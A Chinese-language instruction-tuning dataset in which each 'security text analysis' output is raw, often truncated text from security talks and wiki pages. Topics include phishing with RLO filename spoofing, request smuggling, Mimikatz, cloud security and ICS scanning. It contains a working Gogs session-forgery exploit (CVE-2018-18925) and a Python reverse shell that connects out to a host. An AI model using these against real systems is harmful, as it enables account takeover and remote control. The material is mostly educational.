{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对开发人员的钓鱼 下午看到 @wonderkun 分享了一个项目 此时我还没意识到这个项目的问题在 clone 之后 Readme.md 的介绍是相当的给力我想看看它是如 何实现的 总之看起非常强大有 gif ,还有支持的功能列表就和所有的开源 RAT 一样 究竟是什么 图标看过去是正常的看上去和正常 VS 的项目文件一样 在经过提醒之后发现这个 VS 的项目文件有点奇怪 Type 为 Screen saver 文件的后缀名 为 ..sln  Screen saver 为 Windows 屏幕保护程序在用户不活动时将会触发 屏幕保护程序 这个文件实际上就是一个 PE 就是一个可执行文件 并且伪装了图标 如何伪装的后缀 还有一个疑问它是如何伪装后缀的呢将文件名复制出来后完整的文件名是 : 复制出来的时候发现无法选择到 rcs.. 的位置 @wonderkun 说明为 unincode 反转字符  参考不要让它迷惑了你的双眼UNICODE反转字符串 由于插入 Unicode的RLO,导致文本反向排列 Pantheon V2 HVNCrcs..sln 1 这里的 0x202e 就是 RLO.删除该编码重新解析 参考http://tools.jb51.net/transcoding/chinese2unicode 真实的的文件名为 执行效果是啥 沙箱跑一下emmm 这个绕过方式有点奇怪但是有效 Pantheon V2 HVNCnls..scr 1 扔下 VT  还是有沙箱检查到了动作 后续的分析摸了 好吧我分析不出来 小结 Unicode 使用 RLO 反转字符串 反转的字符串使用 scr非 exe 降低警觉 IDA 直接打开会无法找到文件(也是一个点吧) 项目描述的非常真实包括 gif,图片 修改图标降低警觉 猜测内部的动作 反沙箱比如使用 cmd 进程来了不断 sleep 反调试 使用 discord 和 aws 托管 下一步的 payload 从名字就知道是加密的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n42 2020年12月 第 12 期第33卷 总第280期月刊 2020 年 第 12 期 电信工程技术与标准化 中国移动网络与信息安全专题 基于IPv6的资产管理系统概要设计与实现 李江1李肖肖1安宝宇2付俊1何申1 (1 中国移动通信有限公司研究院北京 1000532 中国移动通信集团公司信息安全管理 与运行中心北京 100053) 摘 要 IPv6具备海量的地址空间地址生成随机性强对IPv6网络空间中的资产进行管理将面临许多新的挑战本 文吸取了业界IPv6存活地址快速发现理论的核心思想结合现在的网络特点设计开发出基于IPv6的资产管 理系统用于辅助对IPv6资产进行管理 关键词 IPv6资产管理扫描 中图分类号 TN918 文献标识码 A 文章编号 1008-5599202012-0042-06 收稿日期 2020-11-07 随着 5G 网络及物联网应用的迅速发展海量终端 设备系统平台的部署及应用也为 IPv6 网络空间下的 资产管理提出了挑战IPv6 网络空间下地址长度扩展 到 128 bit传统的对于 IPv4 的资产管理方式无法满足 IPv6 资产管理的需要如何对 IPv6 网络空间中的资产 进行管理将面临许多新的挑战 1 研究目标和现状 IPv6 资产管理的核心难点在于如何利用有限资源 在可接受的时间范围内准确地掌握资产状态的变化并 对其进行有效监控然而在 IPv6 资产管理技术上存 在多重挑战 1IPv6 可用地址空间更大因为 IPv6 的地址长 度已由原 IPv4 的 32 bit 扩展到 128 bit可表示的地址 数量成指数倍增长原有应对 IPv4 网络内资产管理的 大部分方式方法均不太适用 IPv6 的网络空间 2IPv6 地址生成随机性强IPv6 网络支持设备 通过多种方式来获取 IPv6 地址尤其是无状态地址生 成方式SLAAC该地址生成方式会产生大量随机强 的 IPv6 地址因考虑到隐私安全问题很难进行反向 推测并且该方法已大量应用到实际场景中 3IPv6 常用子网划分方法造成子网空间巨大 IPv6 网络在实际使用中的子网划分过程中经常会按照 / 64 大小的网段来划分供单个局域网来使用在现实场 景下当网络由多个类似 /64 大小的子网构成时由 于这种网络中可用地址空间异常庞大导致无法通过 常规手段来方便快速地收集该网络中现有存活的 IPv6 资产 因此利用有限的时间和空间来更便捷的管理 IPv6 DOI:10.13992/j.cnki.tetas.2020.12.009 43 中国移动网络与信息安全专题 电信工程技术与标准化 2020年12月 第 12 期第33卷 总第280期月刊 2020 年 第 12 期 网络中的资产是一个非常棘手的问题在技术上使用 单一方式对 IPv6 资产进行有效管理是难以实现的目 前业界已经提出过多个针对 IPv6 资产发现的技术与方 法典型的包括探针密集采集法DNS 反向查询法网 络流量分析法和编址规则推测法这 4 种方法在某些特 定场景中可以辅助对 IPv6 的资产进行管理但是一种 方法仅适用于有限的场景 本文吸取了上述已公开的 IPv6 存活地址快速发现 理论的核心思想通过对大量文献进行研究再依托探 测 IPv6 地址的常见算法设计开发出基于 IPv6 的资产 管理系统由一个或多个已知的支持 IPv6 的域名触发 综合多种 IPv6 地址探测算法逐步挖掘更多存活 IPv6 地址通过在实际网络环境中对该系统工具的初步应用 收集到了一批 IPv6 资产数据在一定程度上补足了当 前对 IPv6 暴露面管理缺乏有效工具的短板形成了对 应的能力储备 2 系统设计与实现 2.1 概要设计 IPv6 资产管理系统由 6 个模块构成分别为 IPv6 地址初始收集模块IPv6 地址扩容收集模块关联地址 探测扫描模块编址规则扫描模块随机地址探测扫描 模块和基于日志的存活地址收集模块 上述 6 个模块协同工作最终收集到大量有效的 IPv6 存活地址系统示意如图 1 所示 2.2 IPv6 地址初始收集模块 本功能模块完成 IPv6 地址的初始收集对当前提 供 IPv6 服务的域名集合进行反向 DNS 查询获取到与 域名对应的 IPv6 地址信息并汇总生成 IPv6 地址集 如果当前尚无可用的域名集合也可通过网络爬虫的大 规模的爬取来形成域名集合具体实现方法如下 1通过域名查询工具或指令对具体的域名网址进 行域名反查得出 IPv6 地址此步骤可以获取到一批 初始的 IPv6 地址 2通过域名查询工具或指令中指定 DNS 服务器 参数的功能指定多个不同服务商或地区的 DNS 服 务器并再次进行域名反查 IPv6 地址的操作以增 加获取到不同地址信息的可能性以 nslookup 指令 为", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThis document and its content is the property of Airbus Defence and Space. It shall not be communicated to any third party without the owners written consent | [Airbus Defence and Space Company name]. All rights reserved. CANSPY A Platform for Auditing CAN Devices Arnaud Lebrun Jonathan-Christofer Demay 2 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices Auditing conventional IT systems  Penetration testing  A form of security audit  Assess the risks of intrusion  Actual tests instead of a review process  The point of view of a real attacker (the black-box approach)  Relevant evaluation of impact and exploitability  Limitations  Less time  Less resources  More ethics  Counter-measure: the grey-box approach 3 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices The CISOs dilemma  The hand they are dealt with  Huge scope of responsibility  Continuous changes  Major security threats  Risk of substantial damages  Limited budget  Their response  They rely on penetration testing  They welcome the gray-box approach  They rely on risk analysis first and foremost  They divide perimeters accordingly 4 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 5 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 6 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 7 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices What about car manufacturer ?  They are starting to include cyber-security along with conventional safety 8 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Au", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGet Off of My Cloud: Cloud Credential Compromise and Exposure Ben Feinstein & Jeff Jarmoc Dell SecureWorks Counter Threat Unit 2 The Public Cloud 3 Brief Introduction to the Amazon Cloud  First, some terminology and definitions  Amazon Web Services (AWS)  Elastic Compute Cloud (EC2)  Amazon Machine Image (AMI)  Simple Storage Service (S3)  Elastic Block Store (EBS) 4 AWS Security Credentials  Access Credentials  Access Keys  X.509 Certificates  Amazon EC2 Key Pairs  Amazon CloudFront Key Pairs  Sign-In Credentials  Email Address & Password  AWS Multi-Factor Authentication Device (optional)  Account Identifiers  AWS Account ID  Canonical User ID 5 AWS Access Credentials: Access Keys  Each Access Key has a public and a secret part  Access Key ID  Unique identifier, Included in each API request  Secret Access Key  Used to calculate a digital signature included in each API request  Amazon validates digital signature to ensure authenticity of each API request  Managed via Access Keys tab of AWS Security Credentials page  [screenshot]  Used for making requests to AWS product REST or Query APIs  Used for SOAP APIs of Amazon S3 and Amazon Mechanical Turk  Used for making requests to Amazon CloudFront control API  For security purposes, Amazon recommends rotating Access Keys every 90 days 6 Managing Access Keys 7 AWS Access Credentials: X.509 Certificates  AWS can generate certificate and private key files, or user can provide their own certificate  Trade-off of convenience versus security  Managed via X.509 Certificates tab of AWS Security Credentials page  [screenshot]  Used for making requests to AWS product SOAP APIs   with the exception of Amazon S3 and Amazon Mechanical Turk  Also used for bundling AMIs, which are encrypted and signed using users certificate and private key  For security purposes, Amazon recommends replacing X.509 Certificates every 90 days 8 Managing X.509 Certificates 9 AWS Access Credentials: EC2 Key Pairs  Created and managed with Amazon EC2 API, o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBrowser-Powered Desync Attacks James Ke(le A New Frontier in HTTP Request Smuggling Warning / disclaimer These slides are intended to supplement the presenta1on. They are not suitable for stand-alone consump1on. You can find the whitepaper and presenta1on recording here: h=ps://portswigger.net/research/browser-powered-desync-a=acks If its not uploaded yet, you can get no1fied when its ready by following me at h\"ps://twi\"er.com/albinowax - albinowax A problem and a discovery 2019 Problem: Request Smuggling false positives Solution: Never reuse HTTP/1.1 connections 2021 Problem: Connection-locked request smuggling Solution: Always reuse HTTP/1.1 connections X X CVE-2020-12440 replica lab on portswigger.net/academy portswigger/{http-request-smuggler,turbo-intruder} Full PoC exploit code available in whitepaper  HTTP handling anomalies  Client-side desync  Pause-based desync  Defence & Takeaways  Q&A Outline HTTP handling anomalies The request is a lie Connection state attacks: first-request validation GET / HTTP/1.1 Host: www.example.com GET / HTTP/1.1 Host: intranet.example.com GET / HTTP/1.1 Host: www.example.com GET / HTTP/1.1 Host: intranet.example.com HTTP/1.1 200 OK -connection reset- HTTP/1.1 200 OK HTTP/1.1 200 OK Internal website Connection state attacks: first-request routing POST /pwreset HTTP/1.1 Host: example.com POST /pwreset HTTP/1.1 Host: psres.net POST /pwreset HTTP/1.1 Host: example.com POST /pwreset HTTP/1.1 Host: psres.net HTTP/1.1 302 Found Location: /login HTTP/1.1 421 Misdirected HTTP/1.1 302 Found Location: /login HTTP/1.1 302 Found Location: /login  Reset your password: https://psres.net/reset?k=secret Sometimes: 200 OK Sometimes: 400 Bad Request X The surprise factor POST / HTTP/1.1 Transfer-Encoding: chunked 0 malicious-prefix :method POST :path / For request smuggling, all you need is a server taken by surprise ALB 2021-07-28: Reported 2021-08-05: Fixed 0 malicious-prefix HTTP/1.1 404 Not Found Content-Length: 162 GET / HTTP/1.1 Host: example.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Mimikatz <p align=\"center\"> <img src=\"../../../assets/img/logo/mimikatz.jpg\" width=\"25%\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - https://github.com/gentilkiwi/mimikatz **文章 & Reference** - [九种姿势运行 Mimikatz](https://www.freebuf.com/articles/web/176796.html) - [Mimikatz 使用小技巧](https://www.webshell.cc/5343.html) - [域渗透Dump Clear-Text Password after KB2871997 installed](https://wooyun.js.org/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Dump%20Clear-Text%20Password%20after%20KB2871997%20installed.html) - [红蓝对抗内网渗透-免杀抓取windows hash](https://mp.weixin.qq.com/s/WLP1soWz-_BEouMxTHLbzg) - [Mimikatz的18种免杀姿势及防御策略(上)](https://mp.weixin.qq.com/s/CiOaMnJBcEQfZXV_hopzLw) - [Mimikatz的18种免杀姿势及防御策略(下)](https://mp.weixin.qq.com/s/0p88rj-tWClLa_geKMkPgw) - [防御Mimikatz攻击的方法介绍](https://www.freebuf.com/articles/network/180869.html) - [获取Windows高版本明文密码](https://mp.weixin.qq.com/s/Q-JBDdt6jPi9fawlGAiHzg) - [红队技巧绕过ESET_NOD32抓取密码](https://mp.weixin.qq.com/s/FaiNEUX2wcscotkyAqUO2Q) - [Exploring Mimikatz - Part 1 - WDigest](https://blog.xpnsec.com/exploring-mimikatz-part-1/) - [Mimikatz中sekurlsa::wdigest的实现](https://3gstudent.github.io/3gstudent.github.io/Mimikatz%E4%B8%ADsekurlsa-wdigest%E7%9A%84%E5%AE%9E%E7%8E%B0/) - [Exploring Mimikatz - Part 2 - SSP](https://blog.xpnsec.com/exploring-mimikatz-part-2/) - [深入分析MimikatzSSP](https://www.anquanke.com/post/id/180001) - [MiniDumpWriteDump via COM+ Services DLL的利用测试](https://3gstudent.github.io/3gstudent.github.io/MiniDumpWriteDump-via-COM+-Services-DLL-%E7%9A%84%E5%88%A9%E7%94%A8%E6%B5%8B%E8%AF%95/) - [Extract credentials from lsass remotely](https://en.hackndo.com/remote-lsass-dump-passwords/) - [缓解Mimikatz风格攻击](https://xz.aliyun.com/t/4180) - [你真的了解LSA Protection (RunAsPPL)吗](https://mp.weixin.qq.com/s/7DmfWMHjLXTfCHdoOWQ5qA) - [从svchost.exe转储RDP在线用户的明文密码](https://mp.weixin.qq.com/s/8UU-w6J7JaNLn7lE1mTHZA) - [读取lsass.dmp报错](http://hone.cool/2018/05/23/%E8%AF%BB%E5%8F%96lsass-dmp%E6%96%87%E4%BB", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Dragon Tails: Preserving Supply- Side Vulnerability Disclosure Stewart Scott, Trey Herr Sara Ann Brackett, Yumi Gambrill, Emmeline Nettles #BHUSA @BlackHatEvents Information Classification: General Supply-Side Vulnerability Research  What are sources of security?  Global bug-bounty market size projected to reach $5.5 billion by 2027  Manifests the many eyes theory of security  Increasing adoption by government agencies and departments  Proliferation of bug-bounty platform companies  Governed by Coordinated Vulnerability Disclosure processes (CVD) 2 #BHUSA @BlackHatEvents Information Classification: General Supply-Side Vulnerability Research Anonymized bug-bounty platform revenue streams by country, from Congressional TestimonyDakota Cary, February 17, 2022 3 #BHUSA @BlackHatEvents Information Classification: General Supply-Side Vulnerability Research Can bad policy break this ecosystem, and can we detect those supply shocks? 4 #BHUSA @BlackHatEvents Information Classification: General Good CVD in Log4Shell CMU SEI CERT CC -The CERT Guide to Coordinated Vulnerability Disclosure 5 #BHUSA @BlackHatEvents Information Classification: General Good CVD in Log4Shell  November 24, 2021: Alibaba Cloud researcher discloses log4shell (l4s) to ASF privately.  December 8,* 2021: Researcher follows up with ASF with updates.  December 10, 2021: Patching and public announcements of l4s begin. 6 #BHUSA @BlackHatEvents Information Classification: General Good CVD in Log4Shell  November 24, 2021: Alibaba Cloud researcher discloses log4shell (l4s) to ASF privately.  December 8,* 2021: Researcher follows up with ASF with updates.  December 10, 2021: Patching and public announcements of l4s begin. *December 8 per Bloomberg, December 9 per the Wall Street Journal 7 #BHUSA @BlackHatEvents Information Classification: General Good CVD in Log4Shell  November 24, 2021: Alibaba Cloud researcher discloses log4shell (l4s) to ASF privately.  December 8,* 2021: Researcher foll", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我是衬衫 忍者的弟弟 今天我去 TG 看片 发现了一个机器人 感觉很好玩 那我们也整一个 用来扫描吧 首先 我们去买一个服务器 好的 1 分钟过去了 我们买完了 我们现在需要注册一个机器人 @BotFather TG 加他 起一个好听一点的名字就可以了 很快啊 我们就拿到了自己的 Token https://core.telegram.org/bots/api 这个是 API 文档 可以随便看看 我建议大家先去看一次 python-telegram 那么开始吧 导包下 from telegram import Update,Bot from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext 首先 main 方法 绑定方法 我们先看看 start 方法去熟悉一下 update.message.reply_text(这个是回复用的) 我们可以通过这个 去发消息 怎么读取消息呢 用这个 update.message.text 好的 我们弄出来最基本的东西了 我们现在可以通过 TG 发消息来调用 python 了 举个例子 我们来弄一个目录爆破 Pathscan Bot 是用来发文件的 在上文 这个里面我用了 ffuf 来扫 因为快 然后保存到 test.json 里 用 sendDocument 去发文件 这里面我们输入的命令是/pathscan 通过上面的 add_handler 绑定的那个哦 我的一些正则 瞎 jb 写的 #!/usr/bin/env python # -*- coding: utf-8 -*- import re import requests import os from ESD import EnumSubDomain import nmap import socket from telegram import Update,Bot from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext bot=Bot(\"your token\") def parseDomain(info): domain= re.findall('https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+', info) return domain[0] def parseInfo(info): #取 URL url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',info) return url[0] def parseIP(info): ip = re.findall(\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}$\",info) domain = re.findall(r'(?:[a-zA-Z0-9](?:[a-zA-Z0-9\\-]{,61}[a-zA-Z0-9])?\\.)+[a-zA-Z]{2,6}', info) if ip : return ip[0] elif domain : new_ip = socket.gethostbyname(domain[0]) return new_ip def parseRootDomain(info): rootdomain=re.search(\"([a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62}))\",info) return rootdomain[0] def start(update: Update, context: CallbackContext) -> None: update.message.reply_text(\"好兄弟 给我发个 URL 让我扫描吧\") update.message.reply_text(update.message.text) def pathscan(update: Update, context: CallbackContext) -> None: global bot update.message.reply_text(parseDomain(update.message.text)+\"扫描中好兄弟请不要着 急\") domain=parseDomain(update.message.text) os.system(\"ffuf -w /root/dict/fuzz", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJokes, vulnerabilities, and analysis of commit statements Logan Lodge and Bruce Potter l0l0@shmoo.com gdead@shmoo.com  Whats the only thing you should believe?  Ever checked something in to your repository with statements like this need to be fixed knowing damn well you never will go back and fix it?  Ever write something random in the commit statements because you know no one will ever read them?  Ever invent new profanity in comments?  Yeah, weve done all that too  This projects goal is to analyze commit statements and comments looking for amusing, evil, and interesting things  No, wait  A primer (in this case) is loosely defined as a description of elementary issues for a given topic  It is pronounced prim-er  Primer (prahy-mer) is the shit you put on walls before you paint  Want an example? Watch Jodie Foster in Contact  Then watch her in Taxi Driver just cuz  Three major source repository software suites  CVS  SVN  GIT  Theyre all impressively different  Theres also terabytes of publicly available repositories  Yeah.. There are other repos. You can debate each over in the corner with the GNU/Linux folks  We focused on GIT and SVN  SVN because we know it  GIT because you can get everything via git clone.  Mostly C-based repositories from places like  Github  Sourceforge  And just googling for strings that indicate a public repos  Some python and others  Its a surprise  Identify targets  SF/Github/Google searches  Take URL list and go git them (hahaha)  Shove files in to a hashed directory structure  Needed a way to quickly navigate a HUGE file store (stat() kinda sucks)  MD5 hash of the name, then broke down directories based on hash value  Could have stored it in a DB, but honestly that would be grotesque  Parse all the flat files that we got from the repos and put interesting things in the MySQL database  Comments  Commit statements  Other stuff  Create a web interface to allow for robust querying  Turbogears makes source comments sexy  Python-based  Must be a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nD A V E J O S E P H S E N homeless vikings S H O R T- L I V E D B G P S E S S I O N H I J A C K I N G , A N E W C H A P T E R I N T H E S PA M WA R S Dave Josephsen is author of the upcoming book Building Monitoring Infrastructure with Nagios (Addison-Wesley). He currently works as the senior systems administrator for a small Web hosting com- pany and donates his spare time to the SourceMage GNU Linux project. dave-usenix@skeptech.org T H E F I R ST U N S O L I C I T E D, C O M M E R- cially motivated bulk email was sent on ARPANET in 1978 by a DEC representative named Gary Thuerk [1]. A full 28 years later, spam has evolved into a 55 billion message per day [2] global epidemic that has affect- ed areas of technology unimaginable to the ARPANET engineers of 1978. This article will chronical the history of the spam wars, a war that has almost always been waged along two technological fronts: those of content filtering and delivery countermea- sures. By examining the history of the arms race in the context of recent attacks with zombied PCs and short-lived BGP session hijacks, I conclude that one of these fronts may in fact be a dead end and worth aban- doning altogether. From 1978 to 1994, the business of spam remained a nonissue because email itself was in an infantile state. In the early 1990s, most spam was sent in the context of USENET newsgroups, and by a few identifiable individuals, such as Canter, Siegel, and Wolff [3]. In 1994 the net wit- nessed its first real spam, sometimes referred to as the spam heard round the world, when Canter and Siegels green card message was sent to at least 6000 Usenet groups [4]. In the early days, retribution was swift [5], but things degenerated quickly. In 1995, Floodgate, the first commercially available spamware was available. By 1996, four more automated spam packages were available for sale, as were lists of millions of email addresses [6]. The spammers wasted no time legitimizing their so-called busi- ness model with variou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Gogs 任意用户登录漏洞CVE-2018-18925 gogs是一款极易搭建的自助Git服务平台具有易安装跨平台轻量级等特点使用者众多 其0.11.66及以前版本中go-macaron/session库没有对sessionid进行校验攻击者利用恶意sessionid即可读取任意文件通过控制文件内容来控制session内容进而登录任意账户 参考链接 - https://github.com/gogs/gogs/issues/5469 - https://xz.aliyun.com/t/3168 - https://www.anquanke.com/post/id/163575 ## 环境启动 执行如下命令启动gogs ``` docker compose up -d ``` 环境启动后访问`http://your-ip:3000`即可看到安装页面安装时选择sqlite数据库并开启注册功能 安装完成后需要重启服务`docker compose restart`否则session是存储在内存中的 ## 漏洞利用 使用Gob序列化生成session文件 ```go package main import ( \"bytes\" \"encoding/gob\" \"encoding/hex\" \"fmt\" \"io/ioutil\" \"os\" ) func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) { for _, v := range obj { gob.Register(v) } buf := bytes.NewBuffer(nil) err := gob.NewEncoder(buf).Encode(obj) return buf.Bytes(), err } func main() { var uid int64 = 1 obj := map[interface{}]interface{}{\"_old_uid\": \"1\", \"uid\": uid, \"uname\": \"root\"} data, err := EncodeGob(obj) if err != nil { fmt.Println(err) } err = ioutil.WriteFile(\"data\", data, os.O_CREATE|os.O_WRONLY) if err != nil { fmt.Println(err) } edata := hex.EncodeToString(data) fmt.Println(edata) } ``` 然后注册一个普通用户账户创建项目并在版本发布页面上传刚生成的session文件 ![](1.png) 通过这个附件的URL得知这个文件的文件名`./attachments/2eb7f1a2-b5ec-482e-a297-15b625d24a10` 然后构造Cookie`i_like_gogits=../attachments/2/e/2eb7f1a2-b5ec-482e-a297-15b625d24a10`访问即可发现已经成功登录id=1的用户即管理员 ![](2.png) 完整的利用过程与原理可以阅读参考链接中的文章", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKCon KCon Breaking iOS Mitigation Jails to Achieve Your Own Private Jailbreak Min(Spark) Zheng @ Alibaba Mobile Security ONLY AVAILABLE AT THE SCENE iOS status  Apple sold more than 1 billion iOS devices. More than 380,000 registered iOS developers in the U.S.  It was reported that iOS is more secure than Android due to its controlled distribution channel and comprehensive apps review. E.g., FBI vs Apple.  However, there are still potential risks for iOS systems. We will share our private jailbreak and show how to break the protection of iOS system. iOS System Architecture Sandbox Team ID Entitlement Kernel KPP Jailbreak! ONLY AVAILABLE AT THE SCENE iOS mitigations Sandbox Team ID Entitlement Kernel KPP Jailbreak! You can not touch most of kernel interfaces unless you escape the sandbox. You can not execute or load any binary unless the bin has the platform-binary team-id. You can not create hid devices unless the bin has the com.apple.hid.manager.user-access-device entitlement. You can not control the kernel unless you have kernel bugs and bypass kernel heap mitigations. You can not patch the kernel unless you can bypass the kernel patch protection. Finally, you did it! Sandbox and NSXPC  iOS apps are in the sandbox and they are separated from each other.  App can communicate with unsandboxed system services through IPC (e.g., mach message, XPC, NSXPC).  In this talk, we focus on NSXPC and discuss one IPC vulnerability we found that can escape the sandbox. APP sandbox XPC services NSXPC services APP sandbox iOS 9.0 Jailbreak: CVE-2015-7037  com.apple.PersistentURLTranslator.Gatekeeper  This service has path traversal vulnerability that an app can mv folders outside the sandbox with mobile privilege (used in Pangu9 for jailbreak). ONLY AVAILABLE AT THE SCENE ONLY AVAILABLE AT THE SCENE ONLY AVAILABLE AT THE SCENE Heap spray through OOL msg  Traditional xpc_dictionary heap spray. Failed because the data was freed before pc control.  Asynchronous xpc_dictionary heap s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n深入浅出云计算安全 吴翰清 2012-07 Who am I?  Alibaba security (7 years) (3个月1w册) icloud是云吗 互联网未来的入口 随时随地上网 改变了使用互联网的方式 但这不是传统意义的云计算 云计算的前世今生 电厂模式 Utility Computing 网格计算 云计算 云计算的使命 Computing as Utility 两种云计算 弹性计算 海量数据计算 弹性计算改变建站方式 按需使用按需付费 专业运维服务化 快速部署自助开通 互联网的长尾用户 中小站长创业者 运营商政府公安金融 奢侈品变成消费品 弹性计算冲击安全产业 销售模式变成互联网模式 Security as a Service 结论变革的浪潮就在眼前 弹性计算的安全挑战 巨大的共享环境 网络安全问题 虚拟化技术安全问题  全虚拟化半虚拟化操作系统级虚拟化  虚拟机逃逸问题 (CVE-2011-1898)  D.O.S. Hardware Hypervisor Domain 0 Guest OS Domain U  Guest OS Domain U Host xx XEN的DOS  CVE-2012-2625 XEN 4.x  CVE-2010-4255 XEN 4.0.1  CVE-2010-4247 XEN 3.4.0  CVE-2010-3699 XEN 3.x AppEngine的环境安全  Java sandbox  PHP sandbox 语言级沙箱 系统级沙箱 CVE-2012-0507  Attacking java security manager 突破java sandbox 弹性计算的网络安全 防火墙API 防止ARP 欺骗srcip伪造 自动化清洗DDOS 海量数据计算的安全 以hadoop为例 Map-Reduce简介 海量数据计算的安全挑战 保护用户数据 隐私数据 互联网公司使用hadoop的方式  Hadoop 为linux设计  共享gateway 共享gateway的问题 /home: Hacking Hadoop 原始数据的导 入计算结果的 导出 运行环境安全 并不仅仅是 认证与授权 Map-Reduce job/UDF  用户上传的java code  缺乏sandbox String pysh = \"#!/bin/sh\\r\\npython -c \\\"import os;import sys;import socket;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname ('10.x.x.x'),9999));s.send('Welcome my master\\\\r\\ \\n');os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send('Is there a shell?\\\\r\\ \\n');os.system('/bin/bash');s.close();s.send('See u next time! \\\\r\\\\n');\\\"\"; DEMO 如何解决隐私问题 张三 男 13307491234 北京市一号胡同 李四 女 13466655678 天津市二号小区 Data Masking 保留统计信息掩盖个人信息 张A 男 1330749xxxx 李C 女 1346665yyyy 北京市ABCD胡同 43010419990909MMM1 天津市EFGH小区 42010519880808NNN4 总结 云计算改变互联网 弹性计算的环境安全网络安全 海量数据计算的数据安全隐私 问题 Question? 联系我  微博  h5p://weibo.com/n/aullik5  h5p://t.qq.com/aullik5  博客  h5p://hi.baidu.com/new/aullik5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### ESP 定律法要点 ESP定律的原理在于利用程序中堆栈平衡来快速找到OEP. 由于在程序自解密或者自解压过程中, 不少壳会先将当前寄存器状态压栈, 如使用`pushad`, 在解压结束后, 会将之前的寄存器值出栈, 如使用`popad`. 因此在寄存器出栈时, 往往程序代码被恢复, 此时硬件断点触发. 然后在程序当前位置, 只需要少许单步操作, 就很容易到达正确的OEP位置. 1. 程序刚载入开始pushad/pushfd 2. 将全部寄存器压栈后就设对ESP寄存器设硬件断点 3. 运行程序, 触发断点 4. 删除硬件断点开始分析", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ICS_CTF 发现 > 本栏目内容ICS CTF竞赛内容来自于作者自身打比赛经验如果不对之处请各位老师批评指正 ## 工控设备发现 工控设备发现是工控比赛的前提目前针对工控设备扫描中在NmapMetasploitCenses集成了大量的工具用于挖掘当前在线PLCDCS等ICS设备 ## 工控扫描脚本 ### 基于工控端口的信息扫描脚本 在大量IP中如何发现工控设备,除了工控特殊端口意外大量端口都是正常服务例如ftpsshtelnetsmtpntp等正常网络服务下面列表列举了当前可以利用开源工控扫描脚本 |端口|协议/设备|来源| |:-----|:------|:------| |102(TCP)|siemens s7|nmap --script s7-info.nse -p 102 [host] <br>nmap -sP --script s71200-enumerate-old.nse -p 102 [host]| |502(TCP)|modbus|nmap --script modicon-info -p 502 [host]| |2404(TCP)|IEC 60870-5-104|nmap -Pn -n -d --script iec-identify.nse --script-args='iec-identify.timeout=500' -p 2404 [host]| |20000(TCP)|DNP3|nmap -sT --script dnp3-enumerate.nse -p 20000 [host] <br>nmap --script dnp3-info -p 20000 [host]| |44818(TCP)|Ethernet/IP|nmap --script enip-enumerate -sU -p 44818 [host]| |47808(UDP)|BACnet|nmap --script BACnet-discover-enumerate.nse -sU -p 47808 [host]| |1911(TCP)|Tridium Nixagara Fo|nmap --script fox-info.nse -p 1911 [host]| |789(TCP)|Crimson V3|nmap --scripts cr3-fingerprint.nse -p 789 [host]| |9600(TCP)|OMRON FINS|nmap --script ormontcp-info -p 9600 [host]| |1962 (TCP)|PCWorx|nmap --script pcworx-info -p 1962 [host]| |20547(TCP)|ProConOs|nmap --script proconos-info -p 20547 [host]| |5007(TCP)|Melsec-Q|nmap -script melsecq-discover -sT -p 5007 [host]| 